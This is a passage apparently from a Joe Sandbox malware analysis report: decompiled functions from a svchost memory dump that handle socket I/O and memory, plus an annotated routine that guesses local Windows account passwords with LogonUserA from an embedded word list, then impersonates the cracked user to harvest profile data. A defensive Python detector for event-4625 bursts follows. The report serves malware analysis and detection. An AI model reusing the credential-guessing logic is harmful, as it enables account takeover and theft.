                                                                                                                                        						_push(_a4);
                                                                                                                                        						L1000B8FC(); // executed
                                                                                                                                        						__eflags = _t20;
                                                                                                                                        						if(__eflags >= 0) {
                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                        								 *((intOrPtr*)( *_a8 + 0x10))(_a8,  &_v2052, _t20, 0, _t20);
                                                                                                                                        								_pop(_t23);
                                                                                                                                        								_a12 = _a12 - _t23;
                                                                                                                                        								__eflags = _a12;
                                                                                                                                        								if(_a12 != 0) {
                                                                                                                                        									__eflags = _t24;
                                                                                                                                        									if(_t24 == 0) {
                                                                                                                                        										continue;
                                                                                                                                        									}
                                                                                                                                        								} else {
                                                                                                                                        									_t24 = _t24 + 1;
                                                                                                                                        								}
                                                                                                                                        							} else {
                                                                                                                                        								_t24 = _t24 + 1;
                                                                                                                                        							}
                                                                                                                                        						} else {
                                                                                                                                        						}
                                                                                                                                        						goto L13;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				L13:
                                                                                                                                        				return _t24;
                                                                                                                                        			}











APIs
  • Part of subcall function 100039ED: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 10003A32
• recv.WSOCK32(?,?,00000800,00000000), ref: 10003B09
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: recvselect
• String ID:
• API String ID: 741273618-0
• Opcode ID: 2bc4adfe2a715844beb8abf061af59916263bcd51503f0c77ffb414e8d61ecd3
• Instruction ID: d636064a006fd17202ecd500ecd5a60456039cd65286e38085f50bf31f6252e2
• Opcode Fuzzy Hash: 2bc4adfe2a715844beb8abf061af59916263bcd51503f0c77ffb414e8d61ecd3
• Instruction Fuzzy Hash: 0C01613160024AAFFB12DE51CC91B5BB3ACFB003C8F10C176BB5195199D771D9449A95
Uniqueness

Uniqueness Score: 0.03%

C-Code - Quality: 62%
E10003A4D(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
	char _v5;
	void* __ebx;
	void* _t13;
	void* _t16;
	char* _t18;
	void* _t23;

	_t23 = 0;
	_t13 = E100039ED(_a4, 0x5a); // executed
	if(_t13 != 0) {
		while(1) {
			_t16 = E100039ED(_a4, 0x5a); // executed
			if(_t16 == 0) {
				break;
			}
			_push(0);
			_push(1);
			_t18 =  &_v5;
			_push(_t18);
			_push(_a4);
			L1000B8FC(); // executed
			if(_t18 > 0) {
				if(_v5 == _a16) {
					_t23 = 1;
				}
				_t25 =  *_a8;
				_push(0);
				_push(1);
				_push( &_v5);
				_push(_a8);
				if(E10001091( *((intOrPtr*)( *_a8 + 0x10))(), _t23, _t25, _a8) < _a12) {
					if(_t23 == 0) {
						continue;
					}
				} else {
				}
			}
			goto L9;
		}
	}
	L9:
	return _t23;
}

APIs
  • Part of subcall function 100039ED: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 10003A32
• recv.WSOCK32(?,?,00000001,00000000), ref: 10003A7F
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: recvselect
• String ID:
• API String ID: 741273618-0
• Opcode ID: b7e7d1726f9433d0df41575daf561d69f34c677a7894c62c472bc8c03f918bc0
• Instruction ID: fc4faf5e530eceac94ad05d1ac786ec5ce5fd3324f67245f2d8adfd0b8eff3ec
• Opcode Fuzzy Hash: b7e7d1726f9433d0df41575daf561d69f34c677a7894c62c472bc8c03f918bc0
• Instruction Fuzzy Hash: C101713174424ABBFB02CE54CC82B9FB7ADEB163C0F10C161B9509919AD7B2E9458752
Uniqueness

Uniqueness Score: 0.03%

C-Code - Quality: 73%
E100039A1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
	void* _t8;
	void* _t11;
	intOrPtr _t12;

	if(_a12 != 0) {
                                                                                                                                        					_t12 = _a8;
                                                                                                                                        					_t11 = 0;
                                                                                                                                        					while(1) {
                                                                                                                                        						_push(0);
                                                                                                                                        						_push(_a12);
                                                                                                                                        						_push(_t12);
                                                                                                                                        						_push(_a4);
                                                                                                                                        						L1000B8F0(); // executed
                                                                                                                                        						if(_t8 <= 0) {
                                                                                                                                        							break;
                                                                                                                                        						}
                                                                                                                                        						_t12 = _t12 + _t8;
                                                                                                                                        						_a12 = _a12 - _t8;
                                                                                                                                        						if(_a12 != 0) {
                                                                                                                                        							continue;
                                                                                                                                        						} else {
                                                                                                                                        							_t11 = 1;
                                                                                                                                        						}
                                                                                                                                        						break;
                                                                                                                                        					}
                                                                                                                                        					return _t11;
                                                                                                                                        				} else {
                                                                                                                                        					return 1;
                                                                                                                                        				}
                                                                                                                                        			}
APIs
• send.WSOCK32(?,?,00000000,00000000), ref: 100039C8
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
• Opcode ID: 3e51ce52bfd68b06b1bc1f6fd312fb8546888a7c791e24dd4e33e58b340cee1d
• Instruction ID: bbfd60de75a96c126de5282d17f2767d6f83f4fc78f2c0413de47844af8da33d
• Opcode Fuzzy Hash: 3e51ce52bfd68b06b1bc1f6fd312fb8546888a7c791e24dd4e33e58b340cee1d
• Instruction Fuzzy Hash: 84F030322042499BFB12CE55DC41B4F7398EB953D8F118436FD0186285D3F6D895C791
Uniqueness
Uniqueness Score: 0.03%

C-Code - Quality: 29%
	E100039ED(intOrPtr _a4, intOrPtr _a8) {
		void* _v260;
		char _v264;
		intOrPtr _v268;
		char _v272;
		char* _t11;

		_push(_a8);
		_pop( *_t2);
		_v268 = 0;
		_v264 = 1;
		_push(_a4);
		_pop( *__eax);
		_push( &_v272);
		_push(0);
		_push(0);
		_t11 =  &_v264;
		_push(_t11);
		_push(0); // executed
		L1000B8F6(); // executed
		if(_t11 == 0xffffffff || _t11 == 0) {
			return 0;
		} else {
			return 1;
		}
	}
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 10003A32
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: select
• String ID:
• API String ID: 1274211008-0
• Opcode ID: 87e4bfe3fc6357befbc3962d8e5f4ed8e8220d36c293ef5895b6508363c80064
• Instruction ID: 8eff1452ecc94eb1f5c6b4ef8c50cd8ab51fca225455f5032155a2471cb06b07
• Opcode Fuzzy Hash: 87e4bfe3fc6357befbc3962d8e5f4ed8e8220d36c293ef5895b6508363c80064
• Instruction Fuzzy Hash: 38F0A034600109EEEB20CB50CC81BDAB7BCEB157A4F108291E698D61D0E7F09AC4CF92
Uniqueness
Uniqueness Score: 0.09%

C-Code - Quality: 100%
	E10001F38(CHAR* _a4) {
		char* _t8;
		signed int _t10;

		_t8 = _a4;
		if(_t8 != 0 &&  *_t8 != 0) {
			_t10 = GetFileAttributesA(_a4); // executed
			if(_t10 == 0xffffffff) {
				return 0;
			}
			return (_t10 & 0xffffff00 | (_t10 & 0x00000010) != 0x00000000) & 0x000000ff;
		}
		return 0;
	}
APIs
• GetFileAttributesA.KERNEL32(?), ref: 10001F53
Memory Dump Source
• Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 50ca1663899ea238d9d4f8933858e4c2197070339dd82426c7fcf0bf05897591
• Instruction ID: ed411aa4aec6c6ef364bab04d2e1e02020997d05475f1f61a43318f737b5adec
• Opcode Fuzzy Hash: 50ca1663899ea238d9d4f8933858e4c2197070339dd82426c7fcf0bf05897591
• Instruction Fuzzy Hash: DCE0177121060A6AFB11DA18C8027EA36CACB123E8F014271B924DA1D9CB6CDDA093A5
Uniqueness
Uniqueness Score: 0.01%

C-Code - Quality: 100%
	_entry_() {
		intOrPtr _v8;
		void* _t10;

		_v8 = E024429F0(_entry_);
		E02442B80(_v8);
		E02442500(_t10); // executed
		ExitProcess(0);
	}
APIs
  • Part of subcall function 02442500: Sleep.KERNEL32(0000EA60), ref: 02442602
  • Part of subcall function 02442500: Sleep.KERNEL32(0000EA60), ref: 02442612
• ExitProcess.KERNEL32 ref: 02442987
Memory Dump Source
• Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
Yara matches
Similarity
• API ID: Sleep$ExitProcess
• String ID:
• API String ID: 3633490160-0
• Opcode ID: d5b4b3da077cbe8ad9257c77e459f691ad0f01c67c0f4375af38229beca71731
• Instruction ID: 910770e88f958bf7d7b3b0efe97d87b6fc31a837c79e14eeeb7e3e1d46a809f4
• Opcode Fuzzy Hash: d5b4b3da077cbe8ad9257c77e459f691ad0f01c67c0f4375af38229beca71731
                                                                                                                                        • Instruction Fuzzy Hash: 43D0C7E5D402047BF740FBE59D16B4E76995B00605F100425F90552101FDF177105A67
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E024413D0(void* _a4) {
                                                                                                                                        				void* _t2;
                                                                                                                                        				char _t4;
                                                                                                                                        				void* _t5;
                                                                                                                                        
                                                                                                                                        				if( *0x24473e0 != 0) {
                                                                                                                                        					_t5 =  *0x24473e0; // 0x2140000
                                                                                                                                        					_t4 = RtlFreeHeap(_t5, 0, _a4); // executed
                                                                                                                                        					return _t4;
                                                                                                                                        				}
                                                                                                                                        				return _t2;
                                                                                                                                        			}






                                                                                                                                        0x024413da
                                                                                                                                        0x024413e2
                                                                                                                                        0x024413e9
                                                                                                                                        0x00000000
                                                                                                                                        0x024413e9
                                                                                                                                        0x024413f0

                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(02140000,00000000,02443349,?,02443349,000000FF), ref: 024413E9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: 5e9a620dd3833044c2b4e66edc84f8089ae04dc779cf5bfee62b7889cb3bd8f2
                                                                                                                                        • Instruction ID: de058e655e26ace4d2dfcf066ecfb3634a8ba13c0f1f9df72b5a57895ed0e684
                                                                                                                                        • Opcode Fuzzy Hash: 5e9a620dd3833044c2b4e66edc84f8089ae04dc779cf5bfee62b7889cb3bd8f2
                                                                                                                                        • Instruction Fuzzy Hash: CDC012395C07049BF7189B84E495BB673DDA304249F000C04BA0C46980C7F5A4A0CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                        			E10001016(void* __eax, void* __ecx) {
                                                                                                                                        				void* _t2;
                                                                                                                                        				void* _t5;
                                                                                                                                        
                                                                                                                                        				_t2 = __eax;
                                                                                                                                        				_push( *((intOrPtr*)(_t5 + 8)));
                                                                                                                                        			}





                                                                                                                                        0x10001016
                                                                                                                                        0x10001016

                                                                                                                                        APIs
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 1000101D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateGlobalStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2244384528-0
                                                                                                                                        • Opcode ID: 628beeb322d1e68cce6691aa2f8b21e19734e24018de98077d862d5407c9f819
                                                                                                                                        • Instruction ID: d7713b20978494c342f040917a1a09b1ef40ba06d2470294e11926d0b612a070
                                                                                                                                        • Opcode Fuzzy Hash: 628beeb322d1e68cce6691aa2f8b21e19734e24018de98077d862d5407c9f819
                                                                                                                                        • Instruction Fuzzy Hash: D5A0113A3A0A0020EA208E808803F882A028B22B88F008000B308280C088E282A08222
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001871(void* _a4) {
                                                                                                                                        
                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                        					LocalFree(_a4); // executed
                                                                                                                                        				}
                                                                                                                                        				return 0;
                                                                                                                                        			}



                                                                                                                                        0x10001878
                                                                                                                                        0x1000187d
                                                                                                                                        0x1000187d
                                                                                                                                        0x10001885

                                                                                                                                        APIs
                                                                                                                                        • LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2826327444-0
                                                                                                                                        • Opcode ID: 7254efa9a6969e93284f9a2bb9ed96fe4a81f90a5ebbcf632798d127335707ae
                                                                                                                                        • Instruction ID: 80d817a30550f4a18f0091231c33790211a9345cf22a378cd8607de6062062a5
                                                                                                                                        • Opcode Fuzzy Hash: 7254efa9a6969e93284f9a2bb9ed96fe4a81f90a5ebbcf632798d127335707ae
                                                                                                                                        • Instruction Fuzzy Hash: C9C09B3150550855D7019E24C94579979D597107C8F80C135760554465DF75DB90C6D4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001888(intOrPtr _a4) {
                                                                                                                                        				void* _t4;
                                                                                                                                        
                                                                                                                                        				_t4 = LocalAlloc(0x40, _a4 + 0x80); // executed
                                                                                                                                        				return _t4;
                                                                                                                                        			}




                                                                                                                                        0x10001896
                                                                                                                                        0x1000189c

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                        • Opcode ID: b468feca0c3e71dc907fce6830ce6b324a84b5e517144a4c07ebdcec622e7e02
                                                                                                                                        • Instruction ID: a8eef7f7556d58873c2bd90c27b1ec38d4092bd379410b5a8397de813f9b786e
                                                                                                                                        • Opcode Fuzzy Hash: b468feca0c3e71dc907fce6830ce6b324a84b5e517144a4c07ebdcec622e7e02
                                                                                                                                        • Instruction Fuzzy Hash: E3B092A120060826E240DA48C803F5A73CC9B10A8CF008020BB44A6282C8A8F91042BD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Non-executed Functions

                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                        			E1000B56A(signed int __eax, void* __ecx, signed int __edx) {
                                                                                                                                        				void* _v8;
                                                                                                                                        				CHAR* _v12;
                                                                                                                                        				CHAR* _v16;
                                                                                                                                        				CHAR* _v20;
                                                                                                                                        				CHAR* _v24;
                                                                                                                                        				CHAR* _v28;
                                                                                                                                        				void* _v32;
                                                                                                                                        				void* _v36;
                                                                                                                                        				CHAR* _v40;
                                                                                                                                        				char _v44;
                                                                                                                                        				CHAR* _v48;
                                                                                                                                        				char* _t59;
                                                                                                                                        				int _t61;
                                                                                                                                        				int _t70;
                                                                                                                                        				void* _t71;
                                                                                                                                        				intOrPtr* _t73;
                                                                                                                                        				intOrPtr* _t74;
                                                                                                                                        				void* _t76;
                                                                                                                                        				signed int _t78;
                                                                                                                                        				CHAR* _t80;
                                                                                                                                        
                                                                                                                                        				_t76 = __ecx;
                                                                                                                                        				_push(_t71);
                                                                                                                                        				_push(_t80);
                                                                                                                                        				_t78 = __edx ^ __eax;
                                                                                                                                        				_t44 = __eax ^ _t78;
                                                                                                                                        				_t79 = _t78 ^ _t44;
                                                                                                                                        				_push(0x1000b585);
                                                                                                                                        				asm("clc");
                                                                                                                                        				if((_t78 ^ _t44) < 0) {
                                                                                                                                        					_t1 = _t71 + 0xf4d83d;
                                                                                                                                        					 *_t1 =  *((char*)(_t71 + 0xf4d83d)) + 1;
                                                                                                                                        					asm("adc [eax], al");
                                                                                                                                        					if( *_t1 == 0 ||  *0x1000f4e4 == 0) {
                                                                                                                                        						return 0;
                                                                                                                                        					} else {
                                                                                                                                        						_t73 =  *0x1001139f; // 0x287b300
                                                                                                                                        						while(1) {
                                                                                                                                        							_t74 = _t73;
                                                                                                                                        							if(_t74 == 0) {
                                                                                                                                        								break;
                                                                                                                                        							}
                                                                                                                                        							E10002BA3(_t44, _t79);
                                                                                                                                         							// The string at 0x100113a3 (if set) names one account to skip, compared case-insensitively below;
                                                                                                                                         							// every other entry of the account list (_t74: +4 = user name, +8 = profile path) is attempted.
                                                                                                                                         							if( *0x100113a3 == 0) {
                                                                                                                                         								L9:
                                                                                                                                         								_v8 = 0;
                                                                                                                                         								// Guess 1: password equal to the account name.
                                                                                                                                         								// Arguments: user, domain NULL, password, dwLogonType 2 = LOGON32_LOGON_INTERACTIVE, dwLogonProvider 0 = LOGON32_PROVIDER_DEFAULT, &hToken.
                                                                                                                                         								if(LogonUserA( *(_t74 + 4), 0,  *(_t74 + 4), 2, 0,  &_v8) == 0) {
                                                                                                                                         									_v12 = E100029F6( *(_t74 + 4));	// buffer for a copy of the name (E100029F6: allocator, not resolved by the decompiler)
                                                                                                                                         									// Guess 2: the account name lower-cased. 0x400 = LOCALE_USER_DEFAULT, 0x100 = LCMAP_LOWERCASE.
                                                                                                                                         									if(LCMapStringA(0x400, 0x100,  *(_t74 + 4), lstrlenA( *(_t74 + 4)), _v12, _t51) == 0) {
                                                                                                                                         										L14:
                                                                                                                                         										E10001871(_v12);	// release the lower-case copy (E10001871: matching free, not resolved)
                                                                                                                                         										_t80 = "samantha";	// Guesses 3..n: first entry of an embedded list of consecutive NUL-terminated passwords
                                                                                                                                         										L15:
                                                                                                                                         										_v8 = 0;
                                                                                                                                         										if(LogonUserA( *(_t74 + 4), 0, _t80, 2, 0,  &_v8) != 0) {
                                                                                                                                         											goto L16;
                                                                                                                                         										}
                                                                                                                                         									} else {
                                                                                                                                         										_v8 = 0;
                                                                                                                                         										if(LogonUserA( *(_t74 + 4), 0, _v12, 2, 0,  &_v8) == 0) {
                                                                                                                                         											goto L14;
                                                                                                                                         										} else {
                                                                                                                                         											E10001871(_v12);
                                                                                                                                         											goto L16;
                                                                                                                                         										}
                                                                                                                                         									}
                                                                                                                                         								} else {
                                                                                                                                         									L16:
                                                                                                                                         									// A guess succeeded: _v8 holds a primary token for the account.
                                                                                                                                         									// The structure built at _v44 has the layout of a 32-bit PROFILEINFO:
                                                                                                                                         									// dwSize = 0x20, dwFlags = 1 (PI_NOUI), lpUserName, lpProfilePath, remaining fields zero.
                                                                                                                                         									_v44 = 0x20;
                                                                                                                                         									_v40 = 1;
                                                                                                                                         									 *_t25 =  *(_t74 + 4);	// lpUserName
                                                                                                                                         									 *_t27 =  *((intOrPtr*)(_t74 + 8));	// lpProfilePath
                                                                                                                                         									_v28 = 0;
                                                                                                                                         									_v24 = 0;
                                                                                                                                         									_v20 = 0;
                                                                                                                                         									_v16 = 0;	// hProfile (offset 0x1c of the structure)
                                                                                                                                         									_t59 =  &_v44;
                                                                                                                                         									_push(_t59);
                                                                                                                                         									_push(_v8);
                                                                                                                                         									L1000BA52();	// unresolved thunk; argument order (hToken, &PROFILEINFO) is consistent with LoadUserProfileA
                                                                                                                                         									if(_t59 == 0) {
                                                                                                                                         										_v48 = 0;	// profile not loaded, nothing to unload later
                                                                                                                                         									} else {
                                                                                                                                         										if(_v16 != 0) {
                                                                                                                                         											_push(_v16);
                                                                                                                                         											_pop( *0x1000f159);	// keep hProfile (registry hive handle) in a global for the harvesting code
                                                                                                                                         										}
                                                                                                                                         										_v48 = 1;
                                                                                                                                         									}
                                                                                                                                         									_t61 = ImpersonateLoggedOnUser(_v8);	// switch the thread to the cracked account
                                                                                                                                         									_t62 = _t61;
                                                                                                                                         									if(_t61 != 0) {
                                                                                                                                         										L1000B347(_t62, _t76, _t79);	// runs under that identity, with the user's profile hive available
                                                                                                                                         										if( *0x1000f4d0 != 0) {
                                                                                                                                         											RevertToSelf();
                                                                                                                                         										}
                                                                                                                                         										 *0x1000f159 = 0x80000001;	// reset the global to HKEY_CURRENT_USER
                                                                                                                                         									}
                                                                                                                                         									if(_v48 != 0) {
                                                                                                                                         										_push(_v16);
                                                                                                                                         										_push(_v8);
                                                                                                                                         										L1000BA58();	// unresolved thunk; (hToken, hProfile) is consistent with UnloadUserProfile
                                                                                                                                         									}
                                                                                                                                         									CloseHandle(_v8);
                                                                                                                                         								}
                                                                                                                                         								// Inline strlen over the current list entry (ecx = -1, repne scasb) moves the pointer past its
                                                                                                                                         								// terminating NUL to the next entry; the decompiler does not show _t80 being advanced, the asm does it.
                                                                                                                                         								// The list ends with an empty string, which stops the loop.
                                                                                                                                         								asm("cld");
                                                                                                                                         								_t44 = 0;
                                                                                                                                         								_t76 = 0xffffffff;
                                                                                                                                         								asm("repne scasb");
                                                                                                                                         								if( *_t80 != 0) {
                                                                                                                                         									goto L15;
                                                                                                                                         								}
                                                                                                                                         							} else {
                                                                                                                                         								// Filter set: attempt the account only if its name differs from the configured one.
                                                                                                                                         								_t70 = lstrcmpiA( *0x100113a3,  *(_t74 + 4));
                                                                                                                                         								_t44 = _t70;
                                                                                                                                         								if(_t70 != 0) {
                                                                                                                                         									goto L9;
                                                                                                                                         								} else {
                                                                                                                                         								}
                                                                                                                                         							}
                                                                                                                                         							_t73 =  *_t74;	// next account in the linked list
                                                                                                                                         						}
                                                                                                                                         						return 1;
                                                                                                                                         					}
                                                                                                                                         				} else {
                                                                                                                                         					return _t44;
                                                                                                                                         				}
                                                                                                                                         			}

                                                                                                                                         Instruction addresses of the listing above span 0x1000b56a to 0x1000b749; the per-line address column of the decompiler view is not reproduced here.

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $samantha
                                                                                                                                        • API String ID: 0-1937562511
                                                                                                                                        • Opcode ID: c62eea48d0cb193630d6ac8ef05d684828dc3db16c5eb5ea3f4f34a9721a1fd2
                                                                                                                                        • Instruction ID: 76b21031c5aff4a5446a83bab7b6247621f3dfe9cc1662b97a318598373b60cd
                                                                                                                                        • Opcode Fuzzy Hash: c62eea48d0cb193630d6ac8ef05d684828dc3db16c5eb5ea3f4f34a9721a1fd2
                                                                                                                                        • Instruction Fuzzy Hash: B9516275900904EFFF11CFA0CD46BED7FB5EB043C4F1480A5E910A91AAD7759A50EB21
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 23.02%
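
The listing above tests passwords against local accounts by calling LogonUserA with logon type 2 (interactive): first the account name, then its lower-cased form, then an embedded word list starting with "samantha". On the victim every failed call raises a Security event 4625 with LogonType 2 and the caller process recorded, so the observable is a burst of interactive logon failures from one process against one or more accounts. The detector below is an added example for this page, not code from the sandbox report or from the sample: it parses constructed 4625 records (field names follow the 4625 schema; timestamps, account names and process paths are invented, and the svchost.exe path only mirrors the process the memory dump above was taken from) and flags any caller process with four or more interactive failures inside a sliding 60-second window. Both thresholds are assumptions to tune per host.

```python
"""
Burst detector for local interactive logon failures (Security event 4625,
LogonType 2) attributed to one caller process, the pattern produced by the
LogonUserA password cycling in the listing above.

Added example, not part of the sandbox report or the sample. Event lines are
constructed; thresholds are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List, Optional, Tuple

STATUS_LOGON_FAILURE = 0xC000006D  # NTSTATUS reported in the Status field of a bad-password 4625

# Constructed sample: one process cycling guesses against two local accounts,
# one mistyped console password (winlogon), one remote network failure.
SAMPLE_EVENTS = """\
2021-03-03T10:00:00Z EventID=4625 LogonType=2 TargetUserName=alice Status=0xC000006D SubStatus=0xC000006A ProcessName=C:\\Windows\\System32\\svchost.exe
2021-03-03T10:00:00Z EventID=4625 LogonType=2 TargetUserName=alice Status=0xC000006D SubStatus=0xC000006A ProcessName=C:\\Windows\\System32\\svchost.exe
2021-03-03T10:00:01Z EventID=4625 LogonType=2 TargetUserName=alice Status=0xC000006D SubStatus=0xC000006A ProcessName=C:\\Windows\\System32\\svchost.exe
2021-03-03T10:00:01Z EventID=4625 LogonType=2 TargetUserName=bob Status=0xC000006D SubStatus=0xC000006A ProcessName=C:\\Windows\\System32\\svchost.exe
2021-03-03T10:00:02Z EventID=4625 LogonType=2 TargetUserName=bob Status=0xC000006D SubStatus=0xC000006A ProcessName=C:\\Windows\\System32\\svchost.exe
2021-03-03T10:00:02Z EventID=4625 LogonType=2 TargetUserName=bob Status=0xC000006D SubStatus=0xC000006A ProcessName=C:\\Windows\\System32\\svchost.exe
2021-03-03T10:05:30Z EventID=4625 LogonType=2 TargetUserName=carol Status=0xC000006D SubStatus=0xC000006A ProcessName=C:\\Windows\\System32\\winlogon.exe
2021-03-03T10:07:00Z EventID=4625 LogonType=3 TargetUserName=admin Status=0xC000006D SubStatus=0xC000006A ProcessName=-
"""


@dataclass(frozen=True)
class LogonFailure:
    ts: datetime
    target_user: str
    logon_type: int
    status: int
    process: str  # "Caller Process Name" of the 4625 record


@dataclass(frozen=True)
class Alert:
    process: str
    accounts: Tuple[str, ...]  # distinct TargetUserName values in the densest window
    failures: int
    first: datetime
    last: datetime


def parse_4625(line: str) -> Optional[LogonFailure]:
    """Parse one constructed 'timestamp key=value ...' line; None for non-4625 records."""
    ts_text, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    if kv.get("EventID") != "4625":
        return None
    return LogonFailure(
        ts=datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
        target_user=kv["TargetUserName"],
        logon_type=int(kv["LogonType"]),
        status=int(kv["Status"], 16),
        process=kv["ProcessName"],
    )


def find_local_password_guessing(events: Iterable[LogonFailure],
                                 window: timedelta = timedelta(seconds=60),
                                 min_failures: int = 4) -> List[Alert]:
    """
    One alert per caller process whose interactive (LogonType 2) failures reach
    min_failures inside some sliding window. Network logons (type 3) are left out:
    remote spraying has no local caller process and is a separate detection.
    """
    by_proc: Dict[str, List[LogonFailure]] = defaultdict(list)
    for e in events:
        if e.logon_type == 2 and e.status == STATUS_LOGON_FAILURE:
            by_proc[e.process].append(e)
    alerts: List[Alert] = []
    for proc, evs in by_proc.items():
        evs.sort(key=lambda e: e.ts)
        best: List[LogonFailure] = []
        start = 0
        for end in range(len(evs)):
            while evs[end].ts - evs[start].ts > window:  # shrink window from the left
                start += 1
            span = evs[start:end + 1]
            if len(span) >= min_failures and len(span) > len(best):
                best = span
        if best:
            accounts = tuple(sorted({e.target_user for e in best}))
            alerts.append(Alert(proc, accounts, len(best), best[0].ts, best[-1].ts))
    return alerts


def scan(text: str) -> List[Alert]:
    """Run the detector over newline-separated event lines."""
    events = [ev for ev in (parse_4625(ln) for ln in text.splitlines() if ln.strip()) if ev]
    return find_local_password_guessing(events)


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.process}: {a.failures} interactive failures against {a.accounts} "
              f"between {a.first.isoformat()} and {a.last.isoformat()}")
```

The grouping key is the caller process rather than the target account because the routine walks every account in its list and gives each only a handful of guesses; per-account lockout counters can stay below threshold while the per-process count is unmistakable. A single console typo from winlogon.exe and a network (type 3) failure are deliberately left below the bar.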

                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                        			E10007CB1(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                        				char _v1028;
                                                                                                                                        				char _v2052;
                                                                                                                                        				int _v2056;
